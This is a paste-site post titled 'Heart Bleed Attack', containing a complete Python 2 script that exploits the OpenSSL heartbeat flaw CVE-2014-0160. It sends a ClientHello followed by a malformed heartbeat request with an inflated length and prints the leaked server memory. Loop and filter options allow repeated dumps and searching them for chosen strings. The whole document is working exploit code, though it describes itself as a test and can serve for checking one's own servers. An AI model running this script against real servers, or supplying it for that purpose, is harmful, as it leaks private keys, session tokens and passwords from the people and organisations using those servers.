DarkProgrammer000

Heart Bleed Attack

Feb 2nd, 2019
  1. #!/usr/bin/python
  2.  
  3. import sys
  4. import struct
  5. import socket
  6. import time
  7. import select
  8. import re
  9. import os
  10. from optparse import OptionParser
  11.  
# Command-line interface: one positional argument (the server to test) plus
# the port, the number of repetitions and an optional dump filter.
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)',
)
options.add_option(
    '-p', '--port',
    type='int',
    default=443,
    help='TCP port to test (default: 443)',
)
options.add_option(
    '-l', '--loop',
    type='int',
    default=1,
    help='Loop times',
)
# With no default given, opts.filter is None unless -f is supplied; hexdump()
# relies on that to distinguish "no filter" from "filter set".
options.add_option(
    '-f', '--filter',
    type='string',
    help='String to Filter the hex dump',
)
  16.  
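def h2bin(x):
    """Convert a hex dump laid out with spaces and newlines into raw bytes.

    Only the space and newline characters are removed before decoding; any
    other separator (tabs, carriage returns) is passed to the decoder and
    rejected there.

    Args:
        x: Text made of hex digit pairs, optionally separated by spaces
            and newlines.

    Returns:
        The byte string spelled out by the hex digits.

    Raises:
        TypeError (Python 2) or binascii.Error (Python 3) when the cleaned
        text has an odd length or contains a non-hex character.
    """
    # The 'hex' codec behind str.decode('hex') exists only on Python 2;
    # binascii.unhexlify returns the same bytes there and on Python 3.
    # Imported locally so the helper does not depend on a file-level import.
    import binascii

    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))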
  19.  
# Pre-built TLS ClientHello sent right after the TCP connect.
# Record header: 16 = handshake, 03 02 = TLS 1.1, 00 dc = record length.
# The trailing bytes 00 0f 00 01 01 are the heartbeat extension (type 0x000f,
# length 1, mode 1), which announces heartbeat support to the server.
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                
''')
  37.  
# Heartbeat request used for the CVE-2014-0160 check.
# Record header: 18 = heartbeat (content type 24), 03 02 = TLS 1.1,
# 00 03 = three bytes of record data.
# Message: 01 = heartbeat request, 40 00 = declared payload length 0x4000
# (16384), with no payload bytes following. The declared length exceeds what
# the record carries; an implementation that validates the length against
# the record size drops such a request instead of answering it.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
  42.  
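def getTerminalSize():
    """Return the terminal size as a two-item list ``[rows, columns]``.

    The size is read from ``stty size``. When that command prints nothing
    usable (for example when stdin is not a terminal, as under cron or in a
    pipeline) or reports a zero dimension, ``[24, 80]`` is returned so that
    callers indexing the result do not fail.

    Returns:
        A list of two positive ints: rows first, then columns.
    """
    pipe = os.popen('stty size', 'r')
    try:
        fields = pipe.read().split()
    finally:
        # The original never closed the pipe; release it explicitly.
        pipe.close()

    if len(fields) != 2 or not all(field.isdigit() for field in fields):
        return [24, 80]

    # A real list (not a lazy map object) so the result can be indexed.
    size = [int(field) for field in fields]
    if min(size) < 1:
        # Some pseudo-terminals report "0 0"; a zero width would break the
        # row stepping in hexdump().
        return [24, 80]
    return size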
  49.  
def hexdump(s):
    """Print the printable-ASCII view of ``s``, one terminal-width row at a time.

    Despite the name, no hex column is printed: every byte outside the
    range 32..126 is shown as '.', and the row is printed with a two-space
    indent. Each row covers ``width - 2`` characters while the offset
    advances by ``width`` (the terminal column count).

    Filtering uses the module-level ``opts.filter``:
      * None      -> every row is printed;
      * non-empty -> only rows whose printable view contains it are printed;
      * ''        -> nothing is printed.

    Args:
        s: The byte string to display.
    """
    width = getTerminalSize()[1]
    for start in xrange(0, len(s), width):
        row = s[start:start + width - 2]
        shown = ''.join(['.' if ord(ch) < 32 or ord(ch) > 126 else ch
                         for ch in row])
        wanted = opts.filter
        if wanted is None or (wanted and wanted in shown):
            print '  %s' % (shown)
  61.  
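def recvall(s, length, timeout=5):
    """Read exactly ``length`` bytes from socket ``s`` within ``timeout`` seconds.

    Args:
        s: A connected socket (anything select() and recv() accept).
        length: Number of bytes to collect.
        timeout: Overall deadline in seconds for the whole read.

    Returns:
        The ``length`` bytes read, or None when the deadline passes or the
        peer closes the connection before enough data arrived.
    """
    deadline = time.time() + timeout
    chunks = []
    remain = length
    while remain > 0:
        left = deadline - time.time()
        if left < 0:
            return None
        # Wait no longer than the time still left. The original always
        # passed 5 seconds here, so a short timeout could be overrun.
        readable, _, _ = select.select([s], [], [], left)
        if s in readable:
            data = s.recv(remain)
            # An empty read means the peer closed the connection.
            if not data:
                return None
            chunks.append(data)
            remain -= len(data)
    # b'' is a plain str on Python 2, so the return type is unchanged there.
    return b''.join(chunks)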
  79.          
  80.  
def recvmsg(s):
    """Read one TLS record from ``s`` and return ``(type, version, payload)``.

    The 5-byte record header is unpacked as big-endian: a one-byte content
    type, a two-byte version and a two-byte payload length. The header is
    read with recvall()'s default timeout, the payload with a 10 second one.

    Returns:
        ``(typ, ver, pay)`` on success, or ``(None, None, None)`` when either
        the header or the payload could not be read in full.
    """
    header = recvall(s, 5)
    if header is not None:
        rec_type, rec_version, rec_length = struct.unpack('>BHH', header)
        body = recvall(s, rec_length, 10)
        if body is not None:
            return rec_type, rec_version, body
    return None, None, None
  90.  
def hit_hb(s):
    """Send the heartbeat request and classify the server's reply.

    Records are read until one of three things happens:
      * nothing (more) can be read  -> a message is printed, returns False;
      * a heartbeat record (type 24) -> its payload is dumped, returns True;
      * an alert record (type 21)    -> its payload is dumped, returns False.
    Records of any other type are skipped.

    A True result only says that a heartbeat record came back; the payload
    length is not examined here. A server that answers the malformed
    request at all should be treated as affected by CVE-2014-0160 and moved
    to a fixed OpenSSL build.

    Args:
        s: Socket on which the TLS handshake has reached ServerHelloDone.

    Returns:
        True when a heartbeat response was received, otherwise False.
    """
    s.send(hb)
    while True:
        rec_type, _version, body = recvmsg(s)
        if rec_type is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if rec_type in (24, 21):
            hexdump(body)
            return rec_type == 24
  106.  
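def main():
    """Run one CVE-2014-0160 check against the server named on the command line.

    Reads the module globals ``args`` and ``opts`` set by the ``__main__``
    block. With no server argument the usage text is printed. Otherwise the
    function connects to ``args[0]`` on ``opts.port``, sends the ClientHello,
    reads records until a handshake record starting with 0x0E
    (ServerHelloDone) arrives, sends the heartbeat request and passes the
    socket to hit_hb(), which prints the outcome.

    NOTE(review): hit_hb() sends the heartbeat request again, so two
    requests go out per run; kept as in the original.

    Returns:
        None. Results are reported on stdout only.
    """
    if not args:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((args[0], opts.port))
        s.send(hello)
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Handshake record (22) whose first byte is 0x0E: ServerHelloDone.
            # The `pay and` guard keeps a zero-length record from the server
            # from raising IndexError on pay[0].
            if typ == 22 and pay and ord(pay[0]) == 0x0E:
                break

        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)
    finally:
        # The original never closed the socket, leaking one descriptor per
        # --loop iteration.
        s.close()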
  130.  
if __name__ == '__main__':
    # Parse the command line once; main() and hexdump() read `opts` and
    # `args` as module globals. The check is then repeated --loop times.
    opts, args = options.parse_args()
    runs_left = opts.loop
    while runs_left > 0:
        main()
        runs_left -= 1